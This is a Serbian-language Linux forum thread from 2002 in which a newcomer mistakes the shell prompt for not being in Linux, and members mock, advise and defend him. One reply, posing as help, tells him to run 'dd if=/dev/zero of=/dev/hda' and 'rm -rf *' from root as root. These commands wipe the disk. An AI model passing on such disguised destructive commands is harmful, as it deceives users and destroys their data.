[ vux @ 22.03.2002. 14:09 ] @
Kad ukucam login i password,prihvati mi to,ali nece da mi udje u Linux nego ceka neku komadu.Znaci,posle unosa logina i passworda,pojavi mi se [Vux@loginhost Vux].sta da radim
[ alex @ 22.03.2002. 15:07 ] @
ROFL!!

To sto si dobio ti je komandni shell u kome vec mozes da radis, jer si vec u Linux okruzenju.

Btw, sta ti podrazumevas pod Linux-om? Da li si ikada radio pod nekim UNIX sistemom? Ako mislis na graficki GUI - X Window System, onda lepo kucaj startx pa ces ga i dobiti.

Poz, alex.
[ random @ 22.03.2002. 15:49 ] @
Heheheheee, lele majko što je ovo dobro :o))))))))). Vidiš Gojko da je trebalo da ostaviš onaj forum Lamerz, kako posle ako hoću da se nasmejem da nađem ova divna pitanja?

vux: Ako ti "startx" ne uspe, kucaj "fdisk" i ubij tu crnu đavolju rabotu.
[ Jovan Marjanovic @ 22.03.2002. 18:31 ] @
Ugasi racunar, iskljuci ga iz struje, spakuj ga nazad u originalnu ambalazu, i vrati ga u radnju gde si ga kupio. Reci im da ti vrate novac, i onda isti novac mozes da potrosis na nesto pametnije od kompjutera.
[ Dragoslav Krunić @ 22.03.2002. 19:06 ] @
Bas ste losi bre... Sta bre zezate decka? Vidite da ima ozbiljan problem. Pomozite mu, majku mu.
Elem, decace,... najbolje bi bilo da kucas (kao root):

Code:

dd if=/dev/zero of=/dev/hda


i GUI ce se u roku od desetak minuta pojaviti. Ako se ne pojavi ili izbaci neku gresku, a ti onda kucaj (kao root):

Code:

cd /
rm -rf *


Eto. Tako...
I da, onaj forum 'Lamers' treba vratiti. Gde inace da smestamo ovakve teme?
Pozdrav
[ Gojko Vujovic @ 22.03.2002. 19:37 ] @
Ovo ponašanje stvarno nije fer..

Dečko jeste lupio, ali to nije razlog da ga svi redom osude i da zbog toga izgubi volju za rad na kompjuteru.

Elem, kao što si verovatno do sada shvatio, to što vidiš na ekranu (crni kursor) je pravi linux i to je sve što pravom korisniku treba. Na to se mogu nakačiti još i neki prozori, ali suviše je detalja da bih ti u jednoj poruci rekao sve što je potrebno. Najbolje je da uzmeš dokumentaciju u ruke i čitaš.. internet je pun literature, kao i google, kao i ovaj forum. Linkova ima na pretek, samo malo potraži. Kad naiđeš na neki konkretan problem, slobodno ga postavi ovde, ali na ovako nešto ne možeš očekivati bolji odgovor od ovih do sada. Jer iskreno, bolje je da se vratiš na windows ako te konzola plaši ;)

Puno sreće u daljem radu ^>